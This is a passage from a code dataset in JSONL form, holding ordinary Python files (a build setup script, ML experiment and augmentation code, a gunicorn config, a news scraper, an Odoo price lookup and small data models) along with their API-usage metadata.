"flask.request.args", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 21, "usage_type": "call"}, {"api_name": "flask_dance.contrib.google.google.authorized", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask_dance.contrib.google.google", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 27, "usage_type": "call"}, {"api_name": "flask_dance.contrib.google.google.get", "line_number": 29, "usage_type": "call"}, {"api_name": "flask_dance.contrib.google.google", "line_number": 29, "usage_type": "name"}, {"api_name": "models.user.User.query.filter_by", "line_number": 34, "usage_type": "call"}, {"api_name": "models.user.User.query", "line_number": 34, "usage_type": "attribute"}, {"api_name": "models.user.User", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 43, "usage_type": "name"}, {"api_name": "models.candidate.Candidate", "line_number": 48, "usage_type": "call"}, {"api_name": "models.employer.Employer", "line_number": 54, "usage_type": "call"}, {"api_name": "extensions.db.session.add", "line_number": 62, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 62, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 62, "usage_type": "name"}, {"api_name": "extensions.db.session.commit", "line_number": 63, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 63, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 63, "usage_type": "name"}, {"api_name": "flask_jwt_extended.create_access_token", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 67, "usage_type": "call"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 77, "usage_type": "call"}, {"api_name": "models.user.User.query.filter_by", "line_number": 78, "usage_type": "call"}, {"api_name": "models.user.User.query", "line_number": 78, "usage_type": "attribute"}, {"api_name": "models.user.User", "line_number": 78, "usage_type": "name"}, {"api_name": "models.employer.Employer.query.filter_by", "line_number": 82, "usage_type": "call"}, {"api_name": "models.employer.Employer.query", "line_number": 82, "usage_type": "attribute"}, {"api_name": "models.employer.Employer", "line_number": 82, "usage_type": "name"}, {"api_name": "models.job_post.JobPost.query.filter_by", "line_number": 87, "usage_type": "call"}, {"api_name": "models.job_post.JobPost.query", "line_number": 87, "usage_type": "attribute"}, {"api_name": "models.job_post.JobPost", "line_number": 87, "usage_type": "name"}, {"api_name": "models.candidate.Candidate.query.filter_by", "line_number": 91, "usage_type": "call"}, {"api_name": "models.candidate.Candidate.query", "line_number": 91, "usage_type": "attribute"}, {"api_name": "models.candidate.Candidate", "line_number": 91, "usage_type": "name"}]} +{"seq_id": "39749649765", "text": "import re\nimport setuptools\nimport subprocess\nimport sys\n\nif sys.version_info < (3, 5):\n sys.exit('Python 3.4 or older is not supported.')\n\n\ndef remove_flag3(x):\n return x[3:]\n\nldflags = subprocess.check_output([\"scorep-config\", \"--ldflags\"]).decode('utf-8')\ncflags = subprocess.check_output([\"scorep-config\", \"--cflags\"]).decode('utf-8')\n\nldflags = \" \" + ldflags\ncflags = \" \" + cflags\n\nscorep_include_dir = re.findall(\" -I[/+-@.\\w]*\", cflags)\nscorep_library_dir = re.findall(\" -L[/+-@.\\w]*\", ldflags)\n\nscorep_include_dir = list(map(remove_flag3, scorep_include_dir))[0]\nscorep_library_dir = list(map(remove_flag3, scorep_library_dir))[0]\n\nsetuptools.setup(name='scorep-cli-score',\n version='0.1',\n author='Marcel Achtert',\n author_email='marcel.achtert@tu-dresden.de',\n description='A Score-P-score based filter creation tool',\n url='https://github.com/score-p/scorep-score-gui',\n packages=['scorep_cli_score'],\n python_requires='~=3.5',\n scripts=['scorep_cli_score/scorep-cli-score'],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n 'License :: OSI Approved :: BSD License 2.0',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n ],\n ext_modules=[\n setuptools.Extension('bind',\n sources=['scorep_cli_score/bind.cpp'],\n include_dirs=[scorep_include_dir, '{}/cubelib'.format(scorep_include_dir)],\n library_dirs=[scorep_library_dir],\n libraries=['z', 'cube4', 'scorep_estimator'],\n language='c++'),\n setuptools.Extension('scorep_profile',\n sources=['scorep_cli_score/scorep_profile.cpp'],\n include_dirs=[scorep_include_dir, '{}/cubelib'.format(scorep_include_dir)],\n library_dirs=[scorep_library_dir],\n libraries=['z', 'cube4', 'scorep_estimator'],\n extra_compile_args=['-std=c++14'],\n language='c++'),\n ])\n", "repo_name": "score-p/scorep_cli_score", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 2759, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.version_info", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 7, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 13, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 14, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 19, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 20, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 25, "usage_type": "call"}, {"api_name": "setuptools.Extension", "line_number": 45, "usage_type": "call"}, {"api_name": "setuptools.Extension", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "7536964330", "text": "from collections import namedtuple\n\nimport GPy\n\nfrom gaussian_processes_variational.num_inducing_dimension_experiments import run_single_experiment\nfrom gaussian_processes_variational.parameter_containers import FixedParameterSettings\nfrom gaussian_processes_variational.simulation import RBFSimulator, LinearSimulator\n\n\ndef main():\n \"\"\"Run experiment for different datasets where a grid of number of inducings points and dimensions is explored.\"\"\"\n Experiment = namedtuple('Experiment', ['tag', 'simulator', 'kernel', 'dimensions', 'num_inducings'])\n n = 801\n inducing_points = [1, 2, 3, 4, 5, 10, 20, 50, 100, 200, 300, 400, n]\n dimensions = [1, 2, 3, 4, 5, 10, 15, 20]\n\n experiments = [\n # Experiment('rbf_fix_covariance', RBFSimulator, GPy.kern.RBF, dimensions, inducing_points),\n Experiment('linear_fix_covariance', LinearSimulator, GPy.kern.Linear, dimensions, inducing_points),\n ]\n opt_settings = FixedParameterSettings(fix_inducing_inputs=True)\n for experiment in experiments:\n run_single_experiment(experiment.tag, experiment.kernel, experiment.simulator, n, experiment.dimensions,\n experiment.num_inducings, opt_settings)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "DAlkemade/gaussian_processes_variational", "sub_path": "experiment_fix_inducing_inputs.py", "file_name": "experiment_fix_inducing_inputs.py", "file_ext": "py", "file_size_in_byte": 1249, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.namedtuple", "line_number": 12, "usage_type": "call"}, {"api_name": "gaussian_processes_variational.simulation.LinearSimulator", "line_number": 19, "usage_type": "argument"}, {"api_name": "GPy.kern", "line_number": 19, "usage_type": "attribute"}, {"api_name": "gaussian_processes_variational.parameter_containers.FixedParameterSettings", "line_number": 21, "usage_type": "call"}, {"api_name": "gaussian_processes_variational.num_inducing_dimension_experiments.run_single_experiment", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "7988456665", "text": "access_logfile = '-'\nerror_logfile = '-'\ngraceful_timeout = 60\nlog_file = '-'\nlog_level = 'info'\nlogger_class = 'safe_transaction_service.history.utils.CustomGunicornLogger'\ntimeout = 60\nworker_class = 'gevent'\nworker_connections = 2000\n\n\ndef post_fork(server, worker):\n try:\n from psycogreen.gevent import patch_psycopg\n patch_psycopg()\n worker.log.info(\"Made Psycopg2 Green\")\n except ImportError:\n worker.log.info(\"Psycopg2 not patched\")\n", "repo_name": "bigman1208000/safe-transaction-service", "sub_path": "gunicorn.conf.py", "file_name": "gunicorn.conf.py", "file_ext": "py", "file_size_in_byte": 474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "psycogreen.gevent.patch_psycopg", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "72491990887", "text": "import os\nimport json\nimport datetime\nimport time\nimport argparse\n\nimport pytz\nfrom bs4 import BeautifulSoup\nfrom newspaper import Article\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\n\n\nparser = argparse.ArgumentParser(\n description='A web scraper for Buzzfeed articles.')\n\nrequiredNamed = parser.add_argument_group('required arguments')\nrequiredNamed.add_argument('-q', '--query', type=str, required=True,\n help=\"Query string\")\n\nparser.add_argument('-l', '--link_file', type=str, default=\"\",\n help=\"Path to a newline-delimited file of article links \"\n \"to scrape\")\nparser.add_argument('-r', '--date_range', type=str, default=\"\",\n help=\"A space separated string of dates of the form \"\n \"'mm/dd/yyyy mm/dd/yyyy'. If this argument is not \"\n \"supplied, the scraper will default to searching \"\n \"Buzzfeed's recently tagged articles.\")\n\nparser.add_argument('--sleep_time', type=int, default=5,\n help=\"Time (in seconds) to wait between queries\")\nparser.add_argument('--page_timeout', type=int, default=30,\n help=\"Time (in seconds) after which we stop trying to load \"\n \"a page and retry\")\n\ndef parse_args(parser):\n args = parser.parse_args()\n QUERY = args.query\n QUERY = QUERY.replace(' ', '+')\n\n SLEEP_TIME = args.sleep_time\n PAGE_LOAD_TIMEOUT = args.page_timeout\n\n LINKS_FROM_FILE = False\n if len(args.link_file) > 0:\n LINKS_FROM_FILE = args.link_file\n\n dr = args.date_range\n if len(dr) > 0:\n FROM_LAST = dr.split(' ')\n else:\n FROM_LAST = None\n return QUERY, SLEEP_TIME, PAGE_LOAD_TIMEOUT, LINKS_FROM_FILE, FROM_LAST\n\n\ndef render(query_url):\n browser = webdriver.PhantomJS()\n browser.set_window_size(1120, 550)\n\n browser.implicitly_wait(PAGE_LOAD_TIMEOUT)\n browser.set_page_load_timeout(PAGE_LOAD_TIMEOUT)\n\n try:\n browser.get(query_url)\n html_source = browser.page_source\n browser.quit()\n return html_source\n\n except TimeoutException:\n print(\"\\t\\tRetrying page load after {}s timeout\".format(PAGE_LOAD_TIMEOUT))\n return render(query_url)\n\n\ndef gen_query_url(page_num=1):\n base_url = \"https://www.buzzfeed.com/tag\"\n content = \"{}?p={}\".format(QUERY, page_num)\n query_url = os.path.join(base_url, content)\n return query_url\n\n\ndef search_buzzfeed(query_url):\n result = render(query_url)\n soup = BeautifulSoup(result)\n return soup\n\n\ndef get_article_links(soup):\n base = \"https://www.buzzfeed.com\"\n hits = soup.findAll(\"article\")\n article_links = [hit.findAll(\"a\")[0].attrs['href'] for hit in hits]\n article_links = [base + link for link in article_links]\n return article_links\n\n\ndef get_archive_links(soup):\n base = \"https://www.buzzfeed.com\"\n hits = soup.findAll(\"ul\", class_=\"flow\")\n link_data = [(a.attrs['title'], a.contents[0], a.attrs['href']) for a in\n hits[0].findAll(\"a\")]\n\n links = []\n for lede, title, link in link_data:\n if QUERY.replace(\"+\", \" \").lower() in lede.lower():\n links.append(link)\n elif QUERY.replace(\"+\", \" \").lower() in title.lower():\n links.append(link)\n\n archive_links = [base + link for link in links]\n return archive_links\n\n\ndef date_range(start_date, end_date):\n for n in range(int((end_date - start_date).days) + 1):\n yield start_date + datetime.timedelta(n)\n\n\ndef gen_archive_url(yy, mm, dd):\n base_url = \"https://www.buzzfeed.com/archive/\"\n content = \"{}/{}/{}\".format(yy, mm, dd)\n query_url = os.path.join(base_url, content)\n return query_url\n\n\ndef search_buzzfeed_archive():\n from_month, from_day, from_year = [int(i) for i in FROM_LAST[0].split('/')]\n to_month, to_day, to_year = [int(i) for i in FROM_LAST[1].split('/')]\n\n start_date = datetime.date(from_year, from_month, from_day)\n end_date = datetime.date(to_year, to_month, to_day)\n\n dates = []\n for date in date_range(start_date, end_date):\n dates.append([int(i) for i in date.strftime(\"%Y-%m-%d\").split('-')])\n\n links = []\n links_fp = './links/buzzfeed_links_{}_{}-{}.txt'\\\n .format(QUERY,\n datetime.datetime.strftime(start_date, \"%m%d%y\"),\n datetime.datetime.strftime(end_date, \"%m%d%y\"))\n\n for year, month, day in dates:\n archive_url = gen_archive_url(year, month, day)\n\n time.sleep(SLEEP_TIME)\n soup = search_buzzfeed(archive_url)\n new_links = get_archive_links(soup)\n\n print(\"\\tFound {} article links for archive date {}\"\n .format(len(new_links), \"{}/{}/{}\".format(month, day, year)))\n links += new_links\n\n with open(links_fp, 'a') as handle:\n handle.write('\\n'.join(new_links) + \"\\n\")\n return set(links)\n\n\ndef collect_links():\n links = []\n links_fp = './links/buzzfeed_links_{}.txt'.format(QUERY)\n\n if not os.path.exists(\"./links\"):\n os.makedirs(\"./links\")\n\n # if user passes a date range, we have to search the buzzfeed\n # archives rather than running a search query\n if isinstance(FROM_LAST, list):\n return search_buzzfeed_archive()\n\n prev_page_empty = False\n for idx in range(*PAGE_RANGE):\n query_url = gen_query_url(idx)\n\n time.sleep(SLEEP_TIME)\n soup = search_buzzfeed(query_url)\n new_links = get_article_links(soup)\n\n print(\"\\tFound {} article links on page {} of query results\"\n .format(len(new_links), idx))\n links += new_links\n\n # the most recent 2 pages are empty, we have run out of query pages!\n if len(new_links) == 0:\n if prev_page_empty:\n return set(links)\n else:\n prev_page_empty = True\n else:\n prev_page_empty = False\n with open(links_fp, 'a') as handle:\n handle.write('\\n'.join(new_links) + \"\\n\")\n\n return set(links)\n\n\ndef construct_article(link):\n article = {\"url\": link}\n\n article_obj = Article(url=link, language='en')\n article_obj.download()\n article_obj.parse()\n\n authors = article_obj.authors\n article['text'] = article_obj.text\n article['title'] = article_obj.title\n article['author'] = authors if len(authors) != 0 else None\n article['urlToImage'] = None\n article['description'] = article_obj.summary\n\n article['publishedAt'] = None\n article['before_election'] = None\n\n if article_obj.publish_date:\n date = tz.localize(article_obj.publish_date)\n article['publishedAt'] = date.isoformat()\n article['before_election'] = True if date < ELECTION_DATE else False\n return article\n\n\ndef scrape_articles():\n articles, links = [], []\n\n print('\\n####### Buzzfeed Scraper #######')\n print('Running query:')\n if not FROM_LAST:\n print('Scraping recent pages with the tag \"{}\"\\n'.format(QUERY))\n else:\n print('Scraping pages which contain \"{}\" from archives between '\n '{} and {}\\n'.format(QUERY, *args.date_range.split(' ')))\n\n if not LINKS_FROM_FILE:\n links = collect_links()\n else:\n with open(LINKS_FROM_FILE, 'r') as handle:\n for line in handle:\n links.append(line.strip())\n\n links = [i.strip() for i in set(links) if i.strip() != '']\n print('\\nCollected {} links'.format(len(links)))\n\n for idx, link in enumerate(links):\n print('\\t{}. Scraping {}'.format(idx + 1, link))\n time.sleep(SLEEP_TIME) # for throttling\n article = construct_article(link)\n articles.append(article)\n\n data = {'articles': articles,\n 'source': 'buzzfeed',\n 'status': \"ok\",\n 'query': QUERY,\n 'from_last': None,\n 'pagerange': PAGE_RANGE}\n return data\n\n\ndef today():\n return datetime.datetime.strftime(datetime.datetime.now(), \"%m%d%y\")\n\n\ndef save_json(data, save_fp):\n if not os.path.exists(\"./scraped_json\"):\n os.makedirs(\"./scraped_json\")\n\n with open(save_fp, 'w') as handle:\n json.dump(data, handle, indent=4,\n sort_keys=True, separators=(',', ':'))\n\n\ndef main():\n date = today()\n data = scrape_articles()\n n = len(data['articles'])\n\n save_fp = \"./scraped_json/{}_{}_{}.json\".format('buzzfeed', date, n)\n print('Saving scraped articles to {}'.format(save_fp))\n save_json(data, save_fp)\n\n\nif __name__ == \"__main__\":\n tz = pytz.utc\n PAGE_RANGE = [1, 1000]\n ELECTION_DATE = datetime.datetime(2016, 11, 9, 11, tzinfo=tz)\n QUERY, SLEEP_TIME, PAGE_LOAD_TIMEOUT, LINKS_FROM_FILE, \\\n FROM_LAST = parse_args(parser)\n\n main()\n", "repo_name": "ddbourgin/news-scrapers", "sub_path": "buzzfeed.py", "file_name": "buzzfeed.py", "file_ext": "py", "file_size_in_byte": 8793, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver.PhantomJS", "line_number": 58, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 58, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 70, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 129, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 130, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 139, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 139, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 140, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 140, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 163, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 174, "usage_type": "call"}, {"api_name": "newspaper.Article", "line_number": 199, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 243, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 257, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 257, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 257, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 261, "usage_type": "call"}, {"api_name": "os.path", "line_number": 261, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 262, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 265, "usage_type": "call"}, {"api_name": "pytz.utc", "line_number": 280, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 282, "usage_type": "call"}]} +{"seq_id": "29055917916", "text": "import random\nimport torchvision.transforms as transforms\n\nfrom PIL import ImageFilter, Image, ImageOps\n\n\n\nclass GaussianBlur(object):\n \"\"\"Gaussian blur augmentation in SimCLR https://arxiv.org/abs/2002.05709\"\"\"\n\n def __init__(self, sigma=[.1, 2.]):\n self.sigma = sigma\n\n def __call__(self, x):\n sigma = random.uniform(self.sigma[0], self.sigma[1])\n x = x.filter(ImageFilter.GaussianBlur(radius=sigma))\n return x\n\n\n\nmoco_aug = transforms.Compose([\n transforms.RandomResizedCrop(224, scale=(0.2, 1.)),\n transforms.RandomApply([transforms.ColorJitter(0.4, 0.4, 0.4, 0.1)], p=0.8),\n transforms.RandomGrayscale(p=0.2),\n transforms.RandomApply([GaussianBlur([.1, 2.])], p=0.5),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n])\n\nsimclr_aug = transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.RandomApply([transforms.ColorJitter(0.8, 0.8, 0.8, 0.2)], p=0.8),\n transforms.RandomGrayscale(p=0.2),\n transforms.RandomApply([GaussianBlur([.1, 2.])], p=0.5),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n])\n\neval_aug = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]),\n])\n", "repo_name": "mingkai-zheng/WCL", "sub_path": "data/augmentation.py", "file_name": "augmentation.py", "file_ext": "py", "file_size_in_byte": 1511, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 30, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.uniform", "line_number": 15, "usage_type": "call"}, {"api_name": "PIL.ImageFilter.GaussianBlur", "line_number": 16, "usage_type": "call"}, {"api_name": "PIL.ImageFilter", "line_number": 16, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 21, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 21, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 22, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 22, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomApply", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 23, "usage_type": "name"}, {"api_name": "torchvision.transforms.ColorJitter", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms.RandomGrayscale", "line_number": 24, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 24, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomApply", "line_number": 25, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 25, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomHorizontalFlip", "line_number": 26, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 26, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 27, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 27, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 28, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 28, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 31, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 31, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 32, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 32, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomHorizontalFlip", "line_number": 33, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 33, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomApply", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 34, "usage_type": "name"}, {"api_name": "torchvision.transforms.ColorJitter", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms.RandomGrayscale", "line_number": 35, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 35, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomApply", "line_number": 36, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 36, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 37, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 37, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 38, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 38, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 41, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 41, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 42, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 42, "usage_type": "name"}, {"api_name": "torchvision.transforms.CenterCrop", "line_number": 43, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 43, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 44, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 44, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 45, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "31527769676", "text": "__author__ = \"Breinbaas | Rob van Putten\"\n__copyright__ = \"Copyright 2020\"\n__credits__ = [\"Rob van Putten\"]\n__license__ = \"GPL\"\n__version__ = \"0.1.0\"\n__maintainer__ = \"Rob van Putten\"\n__email__ = \"breinbaasnl@gmail.com\"\n__status__ = \"Development\"\n\nfrom pydantic import BaseModel\nfrom typing import List\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib.patches as patches\n\nfrom .psoilprofile import PSoilprofile\nfrom .pointrd import PointRD\nfrom ..settings import HDSR_SOIL_COLORS\n\n# same here.. should (with more time) split it in some parent / child relation because\n# we are almost copying the normal Geoprofile.. so not neat, but effective for now\nclass PGeoprofile(BaseModel):\n id: str = \"\" # id van het dijktraject\n name: str = \"\" # naam van het dijktraject\n points: List[PointRD] = [] # referentielijn\n soilprofiles: List[PSoilprofile] = [] # gevonden grondprofielen\n\n @property\n def x_left(self):\n if len(self.soilprofiles) > 0:\n return min([sp.x_left for sp in self.soilprofiles])\n raise ValueError(\"Trying to get xleft from an empty geoprofile\")\n\n @property\n def x_right(self):\n if len(self.soilprofiles) > 0:\n return max([sp.x_right for sp in self.soilprofiles])\n raise ValueError(\"Trying to get xright from an empty geoprofile\")\n\n @property\n def z_top(self) -> float:\n if len(self.soilprofiles) > 0:\n return max([sp.z_top for sp in self.soilprofiles])\n raise ValueError(\"Trying to get ztop from an empty geoprofile\")\n\n @property\n def z_bottom(self) -> float:\n if len(self.soilprofiles) > 0:\n return min([sp.z_bottom for sp in self.soilprofiles])\n raise ValueError(\"Trying to get zbottom from an empty geoprofile\")\n\n def get_xy_from_l_on_refline(self, l):\n for i in range(1,len(self.points)):\n p1 = self.points[i-1]\n p2 = self.points[i]\n\n if p1.chainage <= l and l <= p2.chainage:\n x = p1.x + (l - p1.chainage) / (p2.chainage - p1.chainage) * (p1.x - p2.x)\n y = p1.y + (l - p1.chainage) / (p2.chainage - p1.chainage) * (p1.y - p2.y)\n return x, y\n\n raise ValueError(f\"Could not find xy for chainage {l}; min chainage = {self.points[0].chainage}, max chainage = {self.points[-1].chainage}\")\n \n \n def get_partial_refline(self, chainage_start: int, chainage_end: int):\n result = []\n points = np.linspace(chainage_start, chainage_end, int((chainage_end - chainage_start) / 10.) + 1)\n for p in points:\n result.append(self.get_xy_from_l_on_refline(p))\n\n return result\n\n \n def to_dam_input(self, segmentid: int, shapeinput) -> int:\n pass\n \n def plot(self, filename: str) -> None:\n pass", "repo_name": "breinbaas/geoprofielen", "sub_path": "geoprofielen/objects/pgeoprofile.py", "file_name": "pgeoprofile.py", "file_ext": "py", "file_size_in_byte": 2853, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pydantic.BaseModel", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 27, "usage_type": "name"}, {"api_name": "pointrd.PointRD", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}, {"api_name": "psoilprofile.PSoilprofile", "line_number": 28, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "708504241", "text": "from odoo import models, api\r\nfrom urllib.request import urlopen\r\nfrom xml.dom.minidom import parseString\r\nimport json\r\nfrom urllib.parse import urlencode\r\nfrom odoo.exceptions import Warning\r\n\r\n\r\nclass GAProductIntegration(models.Model):\r\n _inherit = 'sale.order.line'\r\n\r\n @api.multi\r\n @api.onchange('product_id')\r\n def product_uom_change(self):\r\n\r\n if self.product_id:\r\n if self.product_id.default_code:\r\n #super(GAProductIntegration, self).product_id_change()\r\n res = super(GAProductIntegration, self).product_uom_change()\r\n data = {'ItemCode': self.product_id.default_code, 'Zone': self.order_id.partner_id.zone_id.code}\r\n url = \"http://sap.stile.com.pk/api/api/demo?\"\r\n content = urlopen(url + urlencode(data)).read()\r\n self.price_unit = parseString(json.loads(str(content, 'utf-8'))).getElementsByTagName('Price')[0].childNodes[0].data\r\n return res\r\n\r\n GAProductIntegration()\r\n\r\n", "repo_name": "MuhammadFaizan1996/abc", "sub_path": "GA_SAP_Integration/model/product.py", "file_name": "product.py", "file_ext": "py", "file_size_in_byte": 1027, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "odoo.models.Model", "line_number": 9, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 9, "usage_type": "name"}, {"api_name": "urllib.request.urlopen", "line_number": 22, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 22, "usage_type": "call"}, {"api_name": "xml.dom.minidom.parseString", "line_number": 23, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 23, "usage_type": "call"}, {"api_name": "odoo.api.multi", "line_number": 12, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 12, "usage_type": "name"}, {"api_name": "odoo.api.onchange", "line_number": 13, "usage_type": "call"}, {"api_name": "odoo.api", "line_number": 13, "usage_type": "name"}]} +{"seq_id": "21015265862", "text": "import time\nfrom data.utils.indicator_mapper import Indicator_Data_Map\nfrom data.current_conditions import NOAA_Current_Observation\n\n\nclass Current_Obs_Mapper(Indicator_Data_Map):\n \"\"\" Mapper for current observation from NOAA \"\"\"\n\n def __init__(self, station):\n\n self._noaa_current_obs = NOAA_Current_Observation(station)\n self.init()\n\n self[\"icon_name\"] = \"sunny\"\n self[\"icon_color\"] = \"#FFFF00\"\n self[\"line1\"] = self.temp_str\n self[\"line2\"] = lambda: time.strftime(\n \"%I:%M\", time.localtime()).lstrip(\"0\")\n self[\"line3\"] = lambda: 